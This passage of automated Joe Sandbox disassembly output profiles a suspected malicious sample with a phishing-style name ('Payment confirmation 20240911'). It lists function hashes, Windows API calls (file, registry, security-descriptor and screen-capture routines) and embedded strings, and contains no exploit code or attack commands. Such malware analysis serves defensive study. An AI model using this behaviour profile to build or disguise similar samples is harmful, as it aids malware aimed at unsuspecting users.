                                          • Opcode ID: 06e23186a1faa1f893fad85d278fa59df6fea546f9eff1326b5b7129d7fa6f14
                                          • Instruction ID: 28a9fe1e6628172ae664a7ab0fa4878fa48d2995a6a03a4fdbe32cda393a0241
                                          • Opcode Fuzzy Hash: 06e23186a1faa1f893fad85d278fa59df6fea546f9eff1326b5b7129d7fa6f14
                                          • Instruction Fuzzy Hash: 6881B471208312AFD721DF18C884A6BBFE8FF88358F00492DFA9997291D774E945CB52
                                          APIs
                                          • LoadImageW.USER32 ref: 0134E3BB
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0134BCBF), ref: 0134E417
                                          • LoadImageW.USER32 ref: 0134E457
                                          • LoadImageW.USER32 ref: 0134E49C
                                          • LoadImageW.USER32 ref: 0134E4D3
                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0134BCBF), ref: 0134E4DF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0134E4EF
                                          • DestroyIcon.USER32(?,?,?,?,?,0134BCBF), ref: 0134E4FE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0134E51B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0134E527
                                            • Part of subcall function 01301BC7: __wcsicmp_l.LIBCMT ref: 01301C50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 2c5ebe906636347e04fa9515d744e5b7ef0512b7b3a13e53f7d935c5000cc1c6
                                          • Instruction ID: 07aadfc12deff1d50754c0b3b7659b44eba698b1d2207b479ca4c844eeb7c1f0
                                          • Opcode Fuzzy Hash: 2c5ebe906636347e04fa9515d744e5b7ef0512b7b3a13e53f7d935c5000cc1c6
                                          • Instruction Fuzzy Hash: D5619071600619BBEB25DF68CC45FBA7BECBB08718F108125F955E61D0DB78EA40C760
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 01330EFF
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 01330F0F
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01330F1B
                                          • __wsplitpath.LIBCMT ref: 01330F79
                                          • _wcscat.LIBCMT ref: 01330F91
                                          • _wcscat.LIBCMT ref: 01330FA3
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 01330FB8
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330FCC
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330FFE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0133101F
                                          • _wcscpy.LIBCMT ref: 0133102B
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0133106A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: 47318a0f5c9ccd4c356cfeb36e4e037d5e9f04c9f947f59959a83d5d4512165e
                                          • Instruction ID: be6e812450bbe7325d7ff6786524350718c97be5cb62b6b89f91e62331f92e82
                                          • Opcode Fuzzy Hash: 47318a0f5c9ccd4c356cfeb36e4e037d5e9f04c9f947f59959a83d5d4512165e
                                          • Instruction Fuzzy Hash: 6E61A0B26143069FC710EF64C8449AFB7E8FF99314F04891EE989C7250EB31E905CB96
                                          APIs
                                            • Part of subcall function 012E49CA: InvalidateRect.USER32(?,00000000,00000001), ref: 012E4A23
                                          • DestroyWindow.USER32 ref: 012FB926
                                          • KillTimer.USER32 ref: 012FB9BD
                                          • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E775
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7A6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7BD
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,012FB85B,00000000,?,?,012FAF1E,?,?), ref: 0135E7D9
                                          • DeleteObject.GDI32(00000000), ref: 0135E7EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID: `"u
                                          • API String ID: 641708696-810275233
                                          • Opcode ID: a9b9d3293796cbf52ebc174d83a5e035c9892e46b6f18625cced404b72865e6e
                                          • Instruction ID: a57b7ec76e1c0c505d1b4ee63e2007978953a4acf10a94e20ab00084118e6320
                                          • Opcode Fuzzy Hash: a9b9d3293796cbf52ebc174d83a5e035c9892e46b6f18625cced404b72865e6e
                                          • Instruction Fuzzy Hash: A4619A35120712DFEB329F29D588B25FFF9FB45B16F44452DE68686A68C770A980CF40
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • CharLowerBuffW.USER32(?,?), ref: 0132DB26
                                          • GetDriveTypeW.KERNEL32 ref: 0132DB73
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DBBB
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DBF2
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0132DC20
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: ab02e3cd17f3e762213b57f4ab308c8a50e3f88add2acc3974b88ded51b0de14
                                          • Instruction ID: 445a5835dcd6e98cc378486ef1d1a51ba1786ed5d852749f8b4cbabde5fb0761
                                          • Opcode Fuzzy Hash: ab02e3cd17f3e762213b57f4ab308c8a50e3f88add2acc3974b88ded51b0de14
                                          • Instruction Fuzzy Hash: 68517F755143169FCB00EF24C99486BB7F8FF98618F40886CE89697260EB31ED09CB81
                                          APIs
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • GetSysColor.USER32(0000000F,?,?,?,?), ref: 012FB067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID: `"u
                                          • API String ID: 259745315-810275233
                                          • Opcode ID: 22e8927a6afd0da73d793a4e412e29a01c621ab3ca5dd88fb36b26ee4b5570f2
                                          • Instruction ID: 22846be80d2d45744153bef27b5c3316aa145495d22af71120227bd512c70223
                                          • Opcode Fuzzy Hash: 22e8927a6afd0da73d793a4e412e29a01c621ab3ca5dd88fb36b26ee4b5570f2
                                          • Instruction Fuzzy Hash: 4241C431210104EFEB355F6CD848BB97B69AB06734F148279FFB58A1E6D7718941CB21
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01354085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 01323145
                                          • LoadStringW.USER32(00000000,?,01354085,00000016), ref: 0132314E
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,01354085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 01323170
                                          • LoadStringW.USER32(00000000,?,01354085,00000016), ref: 01323173
                                          • __swprintf.LIBCMT ref: 013231B3
                                          • __swprintf.LIBCMT ref: 013231C5
                                          • _wprintf.LIBCMT ref: 0132326C
                                          • MessageBoxW.USER32 ref: 01323283
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 748e3a5bf915d68f94a270059fccfe7eae63ae68b93ab6757c137b0c7126c00c
                                          • Instruction ID: 2affb85bbfbeecaaaddd4123f7ea7fdf2a1458cf17a4b3c4a4f96c6ce1796e65
                                          • Opcode Fuzzy Hash: 748e3a5bf915d68f94a270059fccfe7eae63ae68b93ab6757c137b0c7126c00c
                                          • Instruction Fuzzy Hash: A841427191021ABACF14FBE5DD99EEFB7BCBF28605F900065E201B2190EB756E44CB61
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0132D96C
                                          • __swprintf.LIBCMT ref: 0132D98E
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0132D9CB
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0132D9F0
                                          • _memset.LIBCMT ref: 0132DA0F
                                          • _wcsncpy.LIBCMT ref: 0132DA4B
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0132DA80
                                          • CloseHandle.KERNEL32(00000000), ref: 0132DA8B
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0132DA94
                                          • CloseHandle.KERNEL32(00000000), ref: 0132DA9E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 8551badfa305ffc2fd741edb1b260c4aea54fde7e3f6c48dba4b49c18176054f
                                          • Instruction ID: 0538ee03456ee630ff89591c44a0277d8b0a7a89cf4cceb0884ef35fcb92e2c2
                                          • Opcode Fuzzy Hash: 8551badfa305ffc2fd741edb1b260c4aea54fde7e3f6c48dba4b49c18176054f
                                          • Instruction Fuzzy Hash: 8A31C872600218AADB21EFE8DC48FDA77FCBF89714F0081A5F555D20A0E770D6408BA1
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0134E564
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0134BD04,?,?,00000000,?), ref: 0134E57B
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0134BD04,?,?,00000000,?), ref: 0134E586
                                          • CloseHandle.KERNEL32(00000000), ref: 0134E593
                                          • GlobalLock.KERNEL32(00000000), ref: 0134E59C
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0134E5AB
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0134E5B4
                                          • CloseHandle.KERNEL32(00000000), ref: 0134E5BB
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0134E5CC
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0136D9BC,?), ref: 0134E5E5
                                          • GlobalFree.KERNEL32(00000000), ref: 0134E5F5
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0134E619
                                          • CopyImage.USER32 ref: 0134E644
                                          • DeleteObject.GDI32(00000000), ref: 0134E66C
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0134E682
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 95a8ffb9f46fce0cc76dadcd4b15d77b777a3c02326ed37f9a81b5ed32caff0c
                                          • Instruction ID: da3d9ccfaee8de9e4fd1419b9846e503f7bc87ae0aac09e3a106f3e7f72a7a52
                                          • Opcode Fuzzy Hash: 95a8ffb9f46fce0cc76dadcd4b15d77b777a3c02326ed37f9a81b5ed32caff0c
                                          • Instruction Fuzzy Hash: 8E415B75600204FFDB219FA5DC48EAA7BBDFF89725F008068F946D7264D775A900DB60
                                          APIs
                                          • __wsplitpath.LIBCMT ref: 01330C93
                                          • _wcscat.LIBCMT ref: 01330CAB
                                          • _wcscat.LIBCMT ref: 01330CBD
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 01330CD2
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330CE6
                                          • GetFileAttributesW.KERNEL32(?), ref: 01330CFE
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 01330D18
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01330D2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                          • String ID: *.*
                                          • API String ID: 34673085-438819550
                                          • Opcode ID: 32866a97b2fc34a3cf48be3a2628e71f7df2dee71c661882591bc63d5d3c8edc
                                          • Instruction ID: d2bac5032d1ca43684c33d07bc515b0f36068d1ac39fcd53d7d7dc15109e5b91
                                          • Opcode Fuzzy Hash: 32866a97b2fc34a3cf48be3a2628e71f7df2dee71c661882591bc63d5d3c8edc
                                          • Instruction Fuzzy Hash: 2C8196715043059FDB68DF68C8449AEB7E8BFC8318F14882EF985DB250E734D984CB96
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01349AA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01349AA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 01349ACC
                                          • _memset.LIBCMT ref: 01349ADD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01349AEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01349B67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID: `"u
                                          • API String ID: 830647256-810275233
                                          • Opcode ID: 8722cd2acc48aeaeddef60bc4c313d7b8df0d03263e2527dc6e222cefd07d7d9
                                          • Instruction ID: 80be3f02cc855b898004e51c1a416e205f14605a2aeb6a6cd51d39f06bcb3e1e
                                          • Opcode Fuzzy Hash: 8722cd2acc48aeaeddef60bc4c313d7b8df0d03263e2527dc6e222cefd07d7d9
                                          • Instruction Fuzzy Hash: E9614A75A00248AFEB21DFA8CC80FEE7BF8EF09718F144159FA15A7291D770A945CB94
                                          APIs
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                            • Part of subcall function 0131B8E7: GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                            • Part of subcall function 0131B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                            • Part of subcall function 0131B8E7: HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                            • Part of subcall function 0131B982: GetProcessHeap.KERNEL32(00000008,0131B3E1,00000000,00000000,?,0131B3E1,?), ref: 0131B98E
                                            • Part of subcall function 0131B982: HeapAlloc.KERNEL32(00000000,?,0131B3E1,?), ref: 0131B995
                                            • Part of subcall function 0131B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0131B3E1,?), ref: 0131B9A6
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0131B5F7
                                          • _memset.LIBCMT ref: 0131B60C
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0131B62B
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B63C
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0131B679
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0131B695
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B6B2
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0131B6C1
                                          • HeapAlloc.KERNEL32(00000000), ref: 0131B6C8
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0131B6E9
                                          • CopySid.ADVAPI32(00000000), ref: 0131B6F0
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0131B721
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0131B747
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0131B75B
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0133A2DD
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0133A2E9
                                          • CreateCompatibleDC.GDI32(?), ref: 0133A2F5
                                          • SelectObject.GDI32(00000000,?), ref: 0133A302
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0133A356
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0133A392
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0133A3B6
                                          • SelectObject.GDI32(00000006,?), ref: 0133A3BE
                                          • DeleteObject.GDI32(?), ref: 0133A3C7
                                          • DeleteDC.GDI32(00000006), ref: 0133A3CE
                                          • ReleaseDC.USER32(00000000,?), ref: 0133A3D9
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          APIs
                                          • __lock.LIBCMT ref: 0130BA74
                                            • Part of subcall function 01308984: __mtinitlocknum.LIBCMT ref: 01308996
                                            • Part of subcall function 01308984: EnterCriticalSection.KERNEL32(01300127,?,0130876D,0000000D), ref: 013089AF
                                          • __calloc_crt.LIBCMT ref: 0130BA85
                                            • Part of subcall function 01307616: __calloc_impl.LIBCMT ref: 01307625
                                            • Part of subcall function 01307616: Sleep.KERNEL32(00000000,?,01300127,?,012E125D,00000058,?,?), ref: 0130763C
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0130BAA0
                                          • GetStartupInfoW.KERNEL32(?,01396990,00000064,01306B14,013967D8,00000014), ref: 0130BAF9
                                          • __calloc_crt.LIBCMT ref: 0130BB44
                                          • GetFileType.KERNEL32 ref: 0130BB8B
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0130BBC4
                                          Similarity
                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID: 2u
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 0132D567
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0132D589
                                          • __swprintf.LIBCMT ref: 0132D5DC
                                          • _wprintf.LIBCMT ref: 0132D68D
                                          • _wprintf.LIBCMT ref: 0132D6AB
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0132D37F
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0132D3A0
                                          • __swprintf.LIBCMT ref: 0132D3F3
                                          • _wprintf.LIBCMT ref: 0132D499
                                          • _wprintf.LIBCMT ref: 0132D4B7
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • _memset.LIBCMT ref: 0131AF74
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0131AFA9
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0131AFC5
                                          • RegOpenKeyExW.ADVAPI32 ref: 0131AFE1
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0131B00B
                                          • CLSIDFromString.OLE32(?,?), ref: 0131B033
                                          • RegCloseKey.ADVAPI32(?), ref: 0131B03E
                                          • RegCloseKey.ADVAPI32(?), ref: 0131B043
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0132843F
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01328455
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01328466
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01328478
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 01328489
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          APIs
                                          • timeGetTime.WINMM ref: 0132809C
                                            • Part of subcall function 012FE3A5: timeGetTime.WINMM ref: 012FE3A9
                                          • Sleep.KERNEL32(0000000A), ref: 013280C8
                                          • EnumThreadWindows.USER32 ref: 013280EC
                                          • FindWindowExW.USER32 ref: 0132810E
                                          • SetActiveWindow.USER32 ref: 0132812D
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0132813B
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0132815A
                                          • Sleep.KERNEL32(000000FA), ref: 01328165
                                          • IsWindow.USER32 ref: 01328171
                                          • EndDialog.USER32 ref: 01328182
                                          Similarity
